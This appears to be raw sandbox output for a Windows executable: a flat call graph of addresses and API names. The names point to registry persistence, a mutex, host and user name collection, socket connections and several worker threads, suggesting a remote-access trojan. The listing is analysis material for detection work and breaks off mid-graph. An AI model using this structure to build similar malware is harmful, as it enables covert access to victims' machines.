48084 4136f8 RegOpenKeyExA 47433->48084 47436 401e65 22 API calls 47434->47436 47434->47459 47437 40edae 47435->47437 47438 40ed3e 47436->47438 47440 401e65 22 API calls 47437->47440 47442 401e65 22 API calls 47438->47442 47441 40edc0 47440->47441 47445 401e65 22 API calls 47441->47445 47443 40ed53 47442->47443 48024 40da34 47443->48024 47444 40ef51 47446 401e65 22 API calls 47444->47446 47447 40ede9 47445->47447 47448 40ef76 47446->47448 47453 401e65 22 API calls 47447->47453 47820 402093 47448->47820 47451 401f13 28 API calls 47452 40ed72 47451->47452 47455 401f09 11 API calls 47452->47455 47456 40edfa 47453->47456 47455->47459 48082 40cdf9 45 API calls _wcslen 47456->48082 47457 40ef88 47826 41376f RegCreateKeyA 47457->47826 47810 413947 47458->47810 47459->47429 47459->47433 47464 40eea3 ctype 47468 401e65 22 API calls 47464->47468 47465 40ee0a 47465->47458 47466 401e65 22 API calls 47467 40efaa 47466->47467 47832 43baac 47467->47832 47469 40eeba 47468->47469 47469->47444 47473 40eece 47469->47473 47472 40efc1 48087 41cd9b 87 API calls ___scrt_fastfail 47472->48087 47475 401e65 22 API calls 47473->47475 47474 40efe4 47478 402093 28 API calls 47474->47478 47476 40eed7 47475->47476 47479 41bc5e 28 API calls 47476->47479 47481 40eff9 47478->47481 47482 40eee3 47479->47482 47480 40efc8 CreateThread 47480->47474 48848 41d45d 10 API calls 47480->48848 47483 402093 28 API calls 47481->47483 48083 40f474 104 API calls 47482->48083 47485 40f008 47483->47485 47836 41b4ef 47485->47836 47486 40eee8 47486->47444 47488 40eeef 47486->47488 47488->47370 47490 401e65 22 API calls 47491 40f019 47490->47491 47492 401e65 22 API calls 47491->47492 47493 40f02b 47492->47493 47494 401e65 22 API calls 47493->47494 47495 40f04b 47494->47495 47496 43baac _strftime 40 API calls 47495->47496 47497 40f058 47496->47497 47498 401e65 22 API calls 47497->47498 47499 40f063 47498->47499 47500 401e65 22 API calls 47499->47500 47501 40f074 47500->47501 47502 401e65 22 API calls 47501->47502 47503 40f089 47502->47503 47504 401e65 22 API calls 47503->47504 47505 40f09a 47504->47505 47506 40f0a1 StrToIntA 47505->47506 47860 409de4 47506->47860 47509 401e65 22 API calls 47510 40f0bc 47509->47510 47511 40f101 47510->47511 47512 40f0c8 47510->47512 47514 401e65 22 API calls 47511->47514 48088 4344ea 47512->48088 47516 40f111 47514->47516 47520 40f159 47516->47520 47521 40f11d 47516->47521 47517 401e65 22 API calls 47518 40f0e4 47517->47518 47519 40f0eb CreateThread 47518->47519 47519->47511 48851 419fb4 103 API calls 2 library calls 47519->48851 47523 401e65 22 API calls 47520->47523 47522 4344ea new 22 API calls 47521->47522 47525 40f126 47522->47525 47524 40f162 47523->47524 47528 40f1cc 47524->47528 47529 40f16e 47524->47529 47526 401e65 22 API calls 47525->47526 47527 40f138 47526->47527 47532 40f13f CreateThread 47527->47532 47530 401e65 22 API calls 47528->47530 47531 401e65 22 API calls 47529->47531 47533 40f1d5 47530->47533 47534 40f17e 47531->47534 47532->47520 48850 419fb4 103 API calls 2 library calls 47532->48850 47535 40f1e1 47533->47535 47536 40f21a 47533->47536 47537 401e65 22 API calls 47534->47537 47539 401e65 22 API calls 47535->47539 47885 41b60d GetComputerNameExW GetUserNameW 47536->47885 47540 40f193 47537->47540 47542 40f1ea 47539->47542 48095 40d9e8 31 API calls 47540->48095 47547 401e65 22 API calls 47542->47547 47543 401f13 28 API calls 47544 40f22e 47543->47544 47546 401f09 11 API calls 47544->47546 47549 40f237 47546->47549 47550 40f1ff 47547->47550 47548 40f1a6 47551 401f13 28 API calls 47548->47551 47552 40f240 SetProcessDEPPolicy 47549->47552 47553 40f243 CreateThread 47549->47553 47558 43baac _strftime 40 API calls 47550->47558 47554 40f1b2 47551->47554 47552->47553 47556 40f264 47553->47556 47557 40f258 CreateThread 47553->47557 48819 40f7a7 47553->48819 47555 401f09 11 API calls 47554->47555 47559 40f1bb CreateThread 47555->47559 47560 40f279 47556->47560 47561 40f26d CreateThread 47556->47561 47557->47556 48846 4120f7 138 API calls 47557->48846 47562 40f20c 47558->47562 47559->47528 48847 401be9 50 API calls _strftime 47559->48847 47563 40f2cc 47560->47563 47565 402093 28 API calls 47560->47565 47561->47560 48849 4126db 38 API calls ___scrt_fastfail 47561->48849 48096 40c162 7 API calls 47562->48096 47896 4134ff RegOpenKeyExA 47563->47896 47566 40f29c 47565->47566 48097 4052fd 28 API calls 47566->48097 47571 40f2ed 47573 41bc5e 28 API calls 47571->47573 47575 40f2fd 47573->47575 48098 41361b 31 API calls 47575->48098 47580 40f313 47581 401f09 11 API calls 47580->47581 47584 40f31e 47581->47584 47582 40f346 DeleteFileW 47583 40f34d 47582->47583 47582->47584 47583->47391 47584->47391 47584->47582 47585 40f334 Sleep 47584->47585 47585->47584 47586->47264 47587->47268 47588->47273 47589->47271 47590->47281 47591->47282 47592->47284 47593->47287 47594->47291 47595->47293 47600 44fb68 47596->47600 47599 438f5a 8 API calls 3 library calls 47599->47298 47602 44fb81 47600->47602 47604 44fb85 47600->47604 47624 434fcb 47602->47624 47603 4345bd 47603->47296 47603->47599 47604->47602 47607 449ca6 47604->47607 47619 449bf0 47604->47619 47608 449cb2 CallCatchBlock 47607->47608 47631 445888 EnterCriticalSection 47608->47631 47610 449cb9 47632 450183 47610->47632 47612 449cc8 47613 449cd7 47612->47613 47643 449b3a 23 API calls 47612->47643 47644 449cf3 LeaveCriticalSection std::_Lockit::~_Lockit 47613->47644 47616 449cd2 47618 449bf0 2 API calls 47616->47618 47617 449ce8 CallCatchBlock 47617->47604 47618->47613 47622 449bf7 47619->47622 47620 449c3a GetStdHandle 47620->47622 47621 449ca2 47621->47604 47622->47620 47622->47621 47623 449c4d GetFileType 47622->47623 47623->47622 47625 434fd6 IsProcessorFeaturePresent 47624->47625 47626 434fd4 47624->47626 47628 435018 47625->47628 47626->47603 47672 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47628->47672 47630 4350fb 47630->47603 47631->47610 47633 45018f CallCatchBlock 47632->47633 47634 4501b3 47633->47634 47635 45019c 47633->47635 47645 445888 EnterCriticalSection 47634->47645 47653 4405dd 20 API calls _Atexit 47635->47653 47638 4501eb 47654 450212 LeaveCriticalSection std::_Lockit::~_Lockit 47638->47654 47639 4501bf 47639->47638 47646 4500d4 47639->47646 47641 4501a1 _strftime CallCatchBlock 47641->47612 47643->47616 47644->47617 47645->47639 47655 445af3 47646->47655 47648 4500f3 47663 446782 47648->47663 47651 450145 47651->47639 47652 4500e6 47652->47648 47662 448a84 11 API calls 2 library calls 47652->47662 47653->47641 47654->47641 47661 445b00 ___crtLCMapStringA 47655->47661 47656 445b40 47670 4405dd 20 API calls _Atexit 47656->47670 47657 445b2b RtlAllocateHeap 47659 445b3e 47657->47659 47657->47661 47659->47652 47661->47656 47661->47657 47669 442f80 7 API calls 2 library calls 47661->47669 47662->47652 47664 44678d RtlFreeHeap 47663->47664 47665 4467b6 _free 47663->47665 47664->47665 47666 4467a2 47664->47666 47665->47651 47671 4405dd 20 API calls _Atexit 47666->47671 47668 4467a8 GetLastError 47668->47665 47669->47661 47670->47659 47671->47668 47672->47630 47674 434b27 GetStartupInfoW 47673->47674 47674->47302 47676 44f06b 47675->47676 47677 44f062 47675->47677 47676->47306 47680 44ef58 49 API calls 4 library calls 47677->47680 47679->47306 47680->47676 47682 41cb8f LoadLibraryA GetProcAddress 47681->47682 47683 41cb7f GetModuleHandleA GetProcAddress 47681->47683 47684 41cbb8 44 API calls 47682->47684 47685 41cba8 LoadLibraryA GetProcAddress 47682->47685 47683->47682 47684->47310 47685->47684 48101 41b4a8 FindResourceA 47686->48101 47690 40f3ed ctype 48111 4020b7 47690->48111 47693 401fe2 28 API calls 47694 40f413 47693->47694 47695 401fd8 11 API calls 47694->47695 47696 40f41c 47695->47696 47697 43bd51 ___std_exception_copy 21 API calls 47696->47697 47698 40f42d ctype 47697->47698 48117 406dd8 47698->48117 47700 40f460 47700->47312 47702 40210c 47701->47702 47703 4023ce 11 API calls 47702->47703 47704 402126 47703->47704 47705 402569 28 API calls 47704->47705 47706 402134 47705->47706 47706->47315 48171 4020df 47707->48171 47709 41be2e 47712 41bea0 47709->47712 47720 401fe2 28 API calls 47709->47720 47724 401fd8 11 API calls 47709->47724 47728 41be9e 47709->47728 48175 4041a2 47709->48175 48178 41ce34 28 API calls 47709->48178 47710 401fd8 11 API calls 47711 41bed0 47710->47711 47713 401fd8 11 API calls 47711->47713 47716 4041a2 28 API calls 47712->47716 47715 41bed8 47713->47715 47718 401fd8 11 API calls 47715->47718 47717 41beac 47716->47717 47719 401fe2 28 API calls 47717->47719 47721 40ea24 47718->47721 47722 41beb5 47719->47722 47720->47709 47729 40fb17 47721->47729 47723 401fd8 11 API calls 47722->47723 47725 41bebd 47723->47725 47724->47709 48179 41ce34 28 API calls 47725->48179 47728->47710 47730 40fb23 47729->47730 47732 40fb2a 47729->47732 48186 402163 11 API calls 47730->48186 47732->47320 47734 402163 47733->47734 47738 40219f 47734->47738 48187 402730 11 API calls 47734->48187 47736 402184 48188 402712 11 API calls std::_Deallocate 47736->48188 47738->47322 47740 401e6d 47739->47740 47741 401e75 47740->47741 48189 402158 22 API calls 47740->48189 47741->47327 47745 4020df 11 API calls 47744->47745 47746 40532a 47745->47746 48190 4032a0 47746->48190 47748 405346 47748->47335 48194 4051ef 47749->48194 47751 406391 48198 402055 47751->48198 47754 401fe2 47755 401ff1 47754->47755 47762 402039 47754->47762 47756 4023ce 11 API calls 47755->47756 47757 401ffa 47756->47757 47758 40203c 47757->47758 47760 402015 47757->47760 47759 40267a 11 API calls 47758->47759 47759->47762 48230 403098 28 API calls 47760->48230 47763 401fd8 47762->47763 47764 4023ce 11 API calls 47763->47764 47765 401fe1 47764->47765 47765->47347 47767 401fd2 47766->47767 47768 401fc9 47766->47768 47767->47353 48231 4025e0 28 API calls 47768->48231 48232 401fab 47770->48232 47772 40d073 CreateMutexA GetLastError 47772->47369 48233 41bfb7 47773->48233 47778 401fe2 28 API calls 47779 41b2ff 47778->47779 47780 401fd8 11 API calls 47779->47780 47781 41b307 47780->47781 47782 4135a6 31 API calls 47781->47782 47784 41b35d 47781->47784 47783 41b330 47782->47783 47785 41b33b StrToIntA 47783->47785 47784->47376 47786 41b349 47785->47786 47789 41b352 47785->47789 48241 41cf69 22 API calls 47786->48241 47788 401fd8 11 API calls 47788->47784 47789->47788 47791 40772a 47790->47791 47792 413549 3 API calls 47791->47792 47793 407731 47792->47793 47793->47386 47793->47387 47795 41bc72 47794->47795 48242 40b904 47795->48242 47797 41bc7a 47797->47403 47799 401f22 47798->47799 47800 401f6a 47798->47800 47801 402252 11 API calls 47799->47801 47807 401f09 47800->47807 47802 401f2b 47801->47802 47803 401f6d 47802->47803 47804 401f46 47802->47804 48275 402336 47803->48275 48274 40305c 28 API calls 47804->48274 47808 402252 11 API calls 47807->47808 47809 401f12 47808->47809 47809->47416 47811 413965 47810->47811 47812 406dd8 28 API calls 47811->47812 47813 41397a 47812->47813 47814 4020f6 28 API calls 47813->47814 47815 41398a 47814->47815 47816 41376f 14 API calls 47815->47816 47817 413994 47816->47817 47818 401fd8 11 API calls 47817->47818 47819 4139a1 47818->47819 47819->47464 47821 40209b 47820->47821 47822 4023ce 11 API calls 47821->47822 47823 4020a6 47822->47823 48279 4024ed 47823->48279 47827 413788 47826->47827 47828 4137bf 47826->47828 47831 41379a RegSetValueExA RegCloseKey 47827->47831 47829 401fd8 11 API calls 47828->47829 47830 40ef9e 47829->47830 47830->47466 47831->47828 47833 43bac5 _strftime 47832->47833 48283 43ae03 47833->48283 47835 40efb7 47835->47472 47835->47474 47837 41b5a0 47836->47837 47838 41b505 GetLocalTime 47836->47838 47840 401fd8 11 API calls 47837->47840 47839 40531e 28 API calls 47838->47839 47842 41b547 47839->47842 47841 41b5a8 47840->47841 47843 401fd8 11 API calls 47841->47843 47844 406383 28 API calls 47842->47844 47845 40f00d 47843->47845 47846 41b553 47844->47846 47845->47490 48311 402f10 47846->48311 47849 406383 28 API calls 47850 41b56b 47849->47850 48316 407200 77 API calls 47850->48316 47852 41b579 47853 401fd8 11 API calls 47852->47853 47854 41b585 47853->47854 47855 401fd8 11 API calls 47854->47855 47856 41b58e 47855->47856 47857 401fd8 11 API calls 47856->47857 47858 41b597 47857->47858 47859 401fd8 11 API calls 47858->47859 47859->47837 47861 409e02 _wcslen 47860->47861 47862 409e24 47861->47862 47863 409e0d 47861->47863 47865 40da34 31 API calls 47862->47865 47864 40da34 31 API calls 47863->47864 47866 409e15 47864->47866 47867 409e2c 47865->47867 47868 401f13 28 API calls 47866->47868 47869 401f13 28 API calls 47867->47869 47884 409e1f 47868->47884 47870 409e3a 47869->47870 47871 401f09 11 API calls 47870->47871 47872 409e42 47871->47872 48335 40915b 28 API calls 47872->48335 47873 401f09 11 API calls 47875 409e79 47873->47875 48320 40a109 47875->48320 47876 409e54 48336 403014 47876->48336 47881 401f13 28 API calls 47882 409e69 47881->47882 47883 401f09 11 API calls 47882->47883 47883->47884 47884->47873 48388 40417e 47885->48388 47890 403014 28 API calls 47891 41b672 47890->47891 47892 401f09 11 API calls 47891->47892 47893 41b67b 47892->47893 47894 401f09 11 API calls 47893->47894 47895 40f223 47894->47895 47895->47543 47897 413520 RegQueryValueExA RegCloseKey 47896->47897 47898 40f2e4 47896->47898 47897->47898 47898->47415 47898->47571 47900 40f392 47899->47900 47901 413a3f RegDeleteValueW 47899->47901 47900->47410 47901->47900 47903 40dd5b 47902->47903 47904 4134ff 3 API calls 47903->47904 47905 40dd62 47904->47905 47909 40dd81 47905->47909 48482 401707 47905->48482 47907 40dd6f 48485 413877 RegCreateKeyA 47907->48485 47910 414f2a 47909->47910 47911 4020df 11 API calls 47910->47911 47912 414f3e 47911->47912 48499 41b8b3 47912->48499 47915 4020df 11 API calls 47916 414f54 47915->47916 47917 401e65 22 API calls 47916->47917 47918 414f62 47917->47918 47919 43baac _strftime 40 API calls 47918->47919 47920 414f6f 47919->47920 47921 414f81 47920->47921 47922 414f74 Sleep 47920->47922 47923 402093 28 API calls 47921->47923 47922->47921 47924 414f90 47923->47924 47925 401e65 22 API calls 47924->47925 47926 414f99 47925->47926 47927 4020f6 28 API calls 47926->47927 47928 414fa4 47927->47928 47929 41be1b 28 API calls 47928->47929 47930 414fac 47929->47930 48503 40489e WSAStartup 47930->48503 47932 414fb6 47933 401e65 22 API calls 47932->47933 47934 414fbf 47933->47934 47935 401e65 22 API calls 47934->47935 47984 41503e 47934->47984 47936 414fd8 47935->47936 47938 401e65 22 API calls 47936->47938 47937 4020f6 28 API calls 47937->47984 47939 414fe9 47938->47939 47941 401e65 22 API calls 47939->47941 47940 41be1b 28 API calls 47940->47984 47942 414ffa 47941->47942 47943 401e65 22 API calls 47942->47943 47945 41500b 47943->47945 47944 406c1e 28 API calls 47944->47984 47947 401e65 22 API calls 47945->47947 47946 401fe2 28 API calls 47946->47984 47948 41501c 47947->47948 47949 401e65 22 API calls 47948->47949 47950 41502e 47949->47950 48649 40473d 89 API calls 47950->48649 47952 41b4ef 80 API calls 47952->47984 47954 41518c WSAGetLastError 48650 41cae1 30 API calls 47954->48650 47959 41519c 47961 402093 28 API calls 47959->47961 47962 41b4ef 80 API calls 47959->47962 47966 401e65 22 API calls 47959->47966 47967 401e8d 11 API calls 47959->47967 47969 43baac _strftime 40 API calls 47959->47969 47959->47984 48004 415a71 CreateThread 47959->48004 48005 401fd8 11 API calls 47959->48005 48006 401f09 11 API calls 47959->48006 48651 4052fd 28 API calls 47959->48651 48653 40b051 85 API calls 47959->48653 48654 404e26 99 API calls 47959->48654 47961->47959 47962->47959 47964 401e65 22 API calls 47964->47984 47965 40531e 28 API calls 47965->47984 47966->47959 47967->47959 47968 402f10 28 API calls 47968->47984 47970 415acf Sleep 47969->47970 47970->47959 47971 406383 28 API calls 47971->47984 47972 402093 28 API calls 47972->47984 47973 401fd8 11 API calls 47973->47984 47976 40905c 28 API calls 47976->47984 47978 4136f8 3 API calls 47978->47984 47979 4135a6 31 API calls 47979->47984 47980 40417e 28 API calls 47980->47984 47984->47937 47984->47940 47984->47944 47984->47946 47984->47952 47984->47954 47984->47959 47984->47964 47984->47965 47984->47968 47984->47971 47984->47972 47984->47973 47984->47976 47984->47978 47984->47979 47984->47980 47986 401e65 22 API calls 47984->47986 48504 414ee9 47984->48504 48509 40482d 47984->48509 48516 404f51 47984->48516 48531 4048c8 connect 47984->48531 48591 41b7e0 47984->48591 48594 4145bd 47984->48594 48597 441e81 47984->48597 48601 40dd89 47984->48601 48607 41bc42 47984->48607 48610 41bd1e 47984->48610 48614 41bb8e 47984->48614 47987 415439 GetTickCount 47986->47987 47988 41bb8e 28 API calls 47987->47988 48000 415456 47988->48000 47990 41bb8e 28 API calls 47990->48000 47992 41bd1e 28 API calls 47992->48000 47995 402f10 28 API calls 47995->48000 47996 406383 28 API calls 47996->48000 47997 402ea1 28 API calls 47997->48000 47999 401fd8 11 API calls 47999->48000 48000->47990 48000->47992 48000->47995 48000->47996 48000->47997 48000->47999 48001 401f09 11 API calls 48000->48001 48619 41bae6 48000->48619 48621 41ba96 48000->48621 48626 40f8d1 GetLocaleInfoA 48000->48626 48629 402f31 28 API calls 48000->48629 48630 404c10 48000->48630 48652 404aa1 61 API calls ctype 48000->48652 48001->48000 48004->47959 48805 41ad17 105 API calls 48004->48805 48005->47959 48006->47959 48007->47328 48008->47336 48009->47340 48012 4020df 11 API calls 48011->48012 48013 406c2a 48012->48013 48014 4032a0 28 API calls 48013->48014 48015 406c47 48014->48015 48015->47361 48017 40eba4 48016->48017 48018 413573 RegQueryValueExA RegCloseKey 48016->48018 48017->47358 48017->47375 48018->48017 48019->47364 48020->47394 48021->47387 48022->47378 48023->47392 48806 401f86 48024->48806 48027 40da70 48810 41b5b4 29 API calls 48027->48810 48028 40daa5 48031 41bfb7 GetCurrentProcess 48028->48031 48029 40db99 GetLongPathNameW 48033 40417e 28 API calls 48029->48033 48030 40da66 48030->48029 48034 40daaa 48031->48034 48037 40dbae 48033->48037 48038 40db00 48034->48038 48039 40daae 48034->48039 48035 40da79 48036 401f13 28 API calls 48035->48036 48040 40da83 48036->48040 48041 40417e 28 API calls 48037->48041 48042 40417e 28 API calls 48038->48042 48043 40417e 28 API calls 48039->48043 48047 401f09 11 API calls 48040->48047 48044 40dbbd 48041->48044 48045 40db0e 48042->48045 48046 40dabc 48043->48046 48813 40ddd1 28 API calls 48044->48813 48051 40417e 28 API calls 48045->48051 48052 40417e 28 API calls 48046->48052 48047->48030 48049 40dbd0 48814 402fa5 28 API calls 48049->48814 48055 40db24 48051->48055 48053 40dad2 48052->48053 48811 402fa5 28 API calls 48053->48811 48054 40dbdb 48815 402fa5 28 API calls 48054->48815 48812 402fa5 28 API calls 48055->48812 48059 40db2f 48063 401f13 28 API calls 48059->48063 48060 40dadd 48064 401f13 28 API calls 48060->48064 48061 40dbe5 48062 401f09 11 API calls 48061->48062 48065 40dbef 48062->48065 48066 40db3a 48063->48066 48067 40dae8 48064->48067 48068 401f09 11 API calls 48065->48068 48069 401f09 11 API calls 48066->48069 48070 401f09 11 API calls 48067->48070 48071 40dbf8 48068->48071 48072 40db43 48069->48072 48073 40daf1 48070->48073 48074 401f09 11 API calls 48071->48074 48075 401f09 11 API calls 48072->48075 48076 401f09 11 API calls 48073->48076 48077 40dc01 48074->48077 48075->48040 48076->48040 48078 401f09 11 API calls 48077->48078 48079 40dc0a 48078->48079 48080 401f09 11 API calls 48079->48080 48081 40dc13 48080->48081 48081->47451 48082->47465 48083->47486 48085 41371e RegQueryValueExA RegCloseKey 48084->48085 48086 413742 48084->48086 48085->48086 48086->47444 48087->47480 48092 4344ef 48088->48092 48089 43bd51 ___std_exception_copy 21 API calls 48089->48092 48090 40f0d1 48090->47517 48092->48089 48092->48090 48816 442f80 7 API calls 2 library calls 48092->48816 48817 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48092->48817 48818 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48092->48818 48095->47548 48096->47536 48098->47580 48099->47385 48102 41b4c5 LoadResource LockResource SizeofResource 48101->48102 48103 40f3de 48101->48103 48102->48103 48104 43bd51 48103->48104 48109 446137 ___crtLCMapStringA 48104->48109 48105 446175 48121 4405dd 20 API calls _Atexit 48105->48121 48106 446160 RtlAllocateHeap 48108 446173 48106->48108 48106->48109 48108->47690 48109->48105 48109->48106 48120 442f80 7 API calls 2 library calls 48109->48120 48112 4020bf 48111->48112 48122 4023ce 48112->48122 48114 4020ca 48126 40250a 48114->48126 48116 4020d9 48116->47693 48118 4020b7 28 API calls 48117->48118 48119 406dec 48118->48119 48119->47700 48120->48109 48121->48108 48123 4023d8 48122->48123 48124 402428 48122->48124 48123->48124 48133 4027a7 11 API calls std::_Deallocate 48123->48133 48124->48114 48127 40251a 48126->48127 48128 402520 48127->48128 48129 402535 48127->48129 48134 402569 48128->48134 48144 4028e8 48129->48144 48132 402533 48132->48116 48133->48124 48155 402888 48134->48155 48136 40257d 48137 402592 48136->48137 48138 4025a7 48136->48138 48160 402a34 22 API calls 48137->48160 48140 4028e8 28 API calls 48138->48140 48143 4025a5 48140->48143 48141 40259b 48161 4029da 22 API calls 48141->48161 48143->48132 48145 4028f1 48144->48145 48146 402953 48145->48146 48147 4028fb 48145->48147 48169 4028a4 22 API calls 48146->48169 48150 402904 48147->48150 48151 402917 48147->48151 48163 402cae 48150->48163 48153 402915 48151->48153 48154 4023ce 11 API calls 48151->48154 48153->48132 48154->48153 48156 402890 48155->48156 48157 402898 48156->48157 48162 402ca3 22 API calls 48156->48162 48157->48136 48160->48141 48161->48143 48164 402cb8 __EH_prolog 48163->48164 48170 402e54 22 API calls 48164->48170 48166 4023ce 11 API calls 48168 402d92 48166->48168 48167 402d24 48167->48166 48168->48153 48170->48167 48172 4020e7 48171->48172 48173 4023ce 11 API calls 48172->48173 48174 4020f2 48173->48174 48174->47709 48180 40423a 48175->48180 48178->47709 48179->47728 48181 404243 48180->48181 48182 4023ce 11 API calls 48181->48182 48183 40424e 48182->48183 48184 402569 28 API calls 48183->48184 48185 4041b5 48184->48185 48185->47709 48186->47732 48187->47736 48188->47738 48192 4032aa 48190->48192 48191 4032c9 48191->47748 48192->48191 48193 4028e8 28 API calls 48192->48193 48193->48191 48195 4051fb 48194->48195 48204 405274 48195->48204 48197 405208 48197->47751 48199 402061 48198->48199 48200 4023ce 11 API calls 48199->48200 48201 40207b 48200->48201 48226 40267a 48201->48226 48205 405282 48204->48205 48206 405288 48205->48206 48207 40529e 48205->48207 48215 4025f0 48206->48215 48209 4052f5 48207->48209 48210 4052b6 48207->48210 48224 4028a4 22 API calls 48209->48224 48213 4028e8 28 API calls 48210->48213 48214 40529c 48210->48214 48213->48214 48214->48197 48216 402888 22 API calls 48215->48216 48217 402602 48216->48217 48218 402672 48217->48218 48219 402629 48217->48219 48225 4028a4 22 API calls 48218->48225 48222 4028e8 28 API calls 48219->48222 48223 40263b 48219->48223 48222->48223 48223->48214 48227 40268b 48226->48227 48228 4023ce 11 API calls 48227->48228 48229 40208d 48228->48229 48229->47754 48230->47762 48231->47767 48234 41bfc4 GetCurrentProcess 48233->48234 48235 41b2d1 48233->48235 48234->48235 48236 4135a6 RegOpenKeyExA 48235->48236 48237 4135d4 RegQueryValueExA RegCloseKey 48236->48237 48238 4135fe 48236->48238 48237->48238 48239 402093 28 API calls 48238->48239 48240 413613 48239->48240 48240->47778 48241->47789 48243 40b90c 48242->48243 48248 402252 48243->48248 48245 40b917 48252 40b92c 48245->48252 48247 40b926 48247->47797 48249 40225c 48248->48249 48250 4022ac 48248->48250 48249->48250 48259 402779 11 API calls std::_Deallocate 48249->48259 48250->48245 48253 40b966 48252->48253 48254 40b938 48252->48254 48271 4028a4 22 API calls 48253->48271 48260 4027e6 48254->48260 48258 40b942 48258->48247 48259->48250 48261 4027ef 48260->48261 48262 402851 48261->48262 48263 4027f9 48261->48263 48273 4028a4 22 API calls 48262->48273 48266 402802 48263->48266 48267 402815 48263->48267 48272 402aea 28 API calls __EH_prolog 48266->48272 48269 402813 48267->48269 48270 402252 11 API calls 48267->48270 48269->48258 48270->48269 48272->48269 48274->47800 48276 402347 48275->48276 48277 402252 11 API calls 48276->48277 48278 4023c7 48277->48278 48278->47800 48280 4024f9 48279->48280 48281 40250a 28 API calls 48280->48281 48282 4020b1 48281->48282 48282->47457 48299 43ba0a 48283->48299 48285 43ae50 48305 43a7b7 36 API calls 3 library calls 48285->48305 48287 43ae15 48287->48285 48288 43ae2a 48287->48288 48298 43ae2f _strftime 48287->48298 48304 4405dd 20 API calls _Atexit 48288->48304 48291 43ae5c 48292 43ae8b 48291->48292 48306 43ba4f 40 API calls __Tolower 48291->48306 48295 43aef7 48292->48295 48307 43b9b6 20 API calls 2 library calls 48292->48307 48308 43b9b6 20 API calls 2 library calls 48295->48308 48296 43afbe _strftime 48296->48298 48309 4405dd 20 API calls _Atexit 48296->48309 48298->47835 48300 43ba22 48299->48300 48301 43ba0f 48299->48301 48300->48287 48310 4405dd 20 API calls _Atexit 48301->48310 48303 43ba14 _strftime 48303->48287 48304->48298 48305->48291 48306->48291 48307->48295 48308->48296 48309->48298 48310->48303 48317 401fb0 48311->48317 48313 402f1e 48314 402055 11 API calls 48313->48314 48315 402f2d 48314->48315 48315->47849 48316->47852 48318 4025f0 28 API calls 48317->48318 48319 401fbd 48318->48319 48319->48313 48321 40a127 48320->48321 48322 413549 3 API calls 48321->48322 48323 40a12e 48322->48323 48324 40a142 48323->48324 48325 40a15c 48323->48325 48326 409e9b 48324->48326 48327 40a147 48324->48327 48328 40905c 28 API calls 48325->48328 48326->47509 48341 40905c 48327->48341 48330 40a16a 48328->48330 48348 40a179 86 API calls 48330->48348 48334 40a15a 48334->48326 48335->47876 48365 403222 48336->48365 48338 403022 48369 403262 48338->48369 48342 409072 48341->48342 48343 402252 11 API calls 48342->48343 48344 40908c 48343->48344 48349 404267 48344->48349 48346 40909a 48347 40a22d 29 API calls 48346->48347 48347->48334 48361 40a273 163 API calls 48347->48361 48348->48326 48362 40a267 86 API calls 48348->48362 48363 40a289 48 API calls 48348->48363 48364 40a27d 128 API calls 48348->48364 48350 402888 22 API calls 48349->48350 48351 40427b 48350->48351 48352 404290 48351->48352 48353 4042a5 48351->48353 48359 4042df 22 API calls 48352->48359 48355 4027e6 28 API calls 48353->48355 48358 4042a3 48355->48358 48356 404299 48360 402c48 22 API calls 48356->48360 48358->48346 48359->48356 48360->48358 48366 40322e 48365->48366 48375 403618 48366->48375 48368 40323b 48368->48338 48370 40326e 48369->48370 48371 402252 11 API calls 48370->48371 48372 403288 48371->48372 48373 402336 11 API calls 48372->48373 48374 403031 48373->48374 48374->47881 48376 403626 48375->48376 48377 403644 48376->48377 48378 40362c 48376->48378 48380 40369e 48377->48380 48382 40365c 48377->48382 48386 4036a6 28 API calls 48378->48386 48387 4028a4 22 API calls 48380->48387 48384 4027e6 28 API calls 48382->48384 48385 403642 48382->48385 48384->48385 48385->48368 48386->48385 48389 404186 48388->48389 48390 402252 11 API calls 48389->48390 48391 404191 48390->48391 48399 4041bc 48391->48399 48394 4042fc 48410 404353 48394->48410 48396 40430a 48397 403262 11 API calls 48396->48397 48398 404319 48397->48398 48398->47890 48400 4041c8 48399->48400 48403 4041d9 48400->48403 48402 40419c 48402->48394 48404 4041e9 48403->48404 48405 404206 48404->48405 48406 4041ef 48404->48406 48407 4027e6 28 API calls 48405->48407 48408 404267 28 API calls 48406->48408 48409 404204 48407->48409 48408->48409 48409->48402 48411 40435f 48410->48411 48414 404371 48411->48414 48413 40436d 48413->48396 48415 40437f 48414->48415 48416 404385 48415->48416 48417 40439e 48415->48417 48480 4034e6 28 API calls 48416->48480 48418 402888 22 API calls 48417->48418 48419 4043a6 48418->48419 48421 404419 48419->48421 48422 4043bf 48419->48422 48481 4028a4 22 API calls 48421->48481 48425 4027e6 28 API calls 48422->48425 48433 40439c 48422->48433 48425->48433 48433->48413 48480->48433 48488 43aa9a 48482->48488 48486 4138b9 48485->48486 48487 41388f RegSetValueExA RegCloseKey 48485->48487 48486->47909 48487->48486 48491 43aa1b 48488->48491 48490 40170d 48490->47907 48492 43aa2a 48491->48492 48494 43aa3e 48491->48494 48497 4405dd 20 API calls _Atexit 48492->48497 48496 43aa2f __alldvrm _strftime 48494->48496 48498 448957 11 API calls 2 library calls 48494->48498 48496->48490 48497->48496 48498->48496 48502 41b8f9 ctype ___scrt_fastfail 48499->48502 48500 402093 28 API calls 48501 414f49 48500->48501 48501->47915 48502->48500 48503->47932 48505 414f02 getaddrinfo WSASetLastError 48504->48505 48506 414ef8 48504->48506 48505->47984 48655 414d86 29 API calls ___std_exception_copy 48506->48655 48508 414efd 48508->48505 48510 404846 socket 48509->48510 48511 404839 48509->48511 48512 404860 CreateEventW 48510->48512 48513 404842 48510->48513 48656 40489e WSAStartup 48511->48656 48512->47984 48513->47984 48515 40483e 48515->48510 48515->48513 48517 404f65 48516->48517 48518 404fea 48516->48518 48519 404f6e 48517->48519 48520 404fc0 CreateEventA CreateThread 48517->48520 48521 404f7d GetLocalTime 48517->48521 48518->47984 48519->48520 48520->48518 48658 405150 48520->48658 48522 41bb8e 28 API calls 48521->48522 48523 404f91 48522->48523 48657 4052fd 28 API calls 48523->48657 48532 404a1b 48531->48532 48533 4048ee 48531->48533 48534 40497e 48532->48534 48535 404a21 WSAGetLastError 48532->48535 48533->48534 48536 404923 48533->48536 48539 40531e 28 API calls 48533->48539 48534->47984 48535->48534 48537 404a31 48535->48537 48662 420c60 27 API calls 48536->48662 48540 404932 48537->48540 48541 404a36 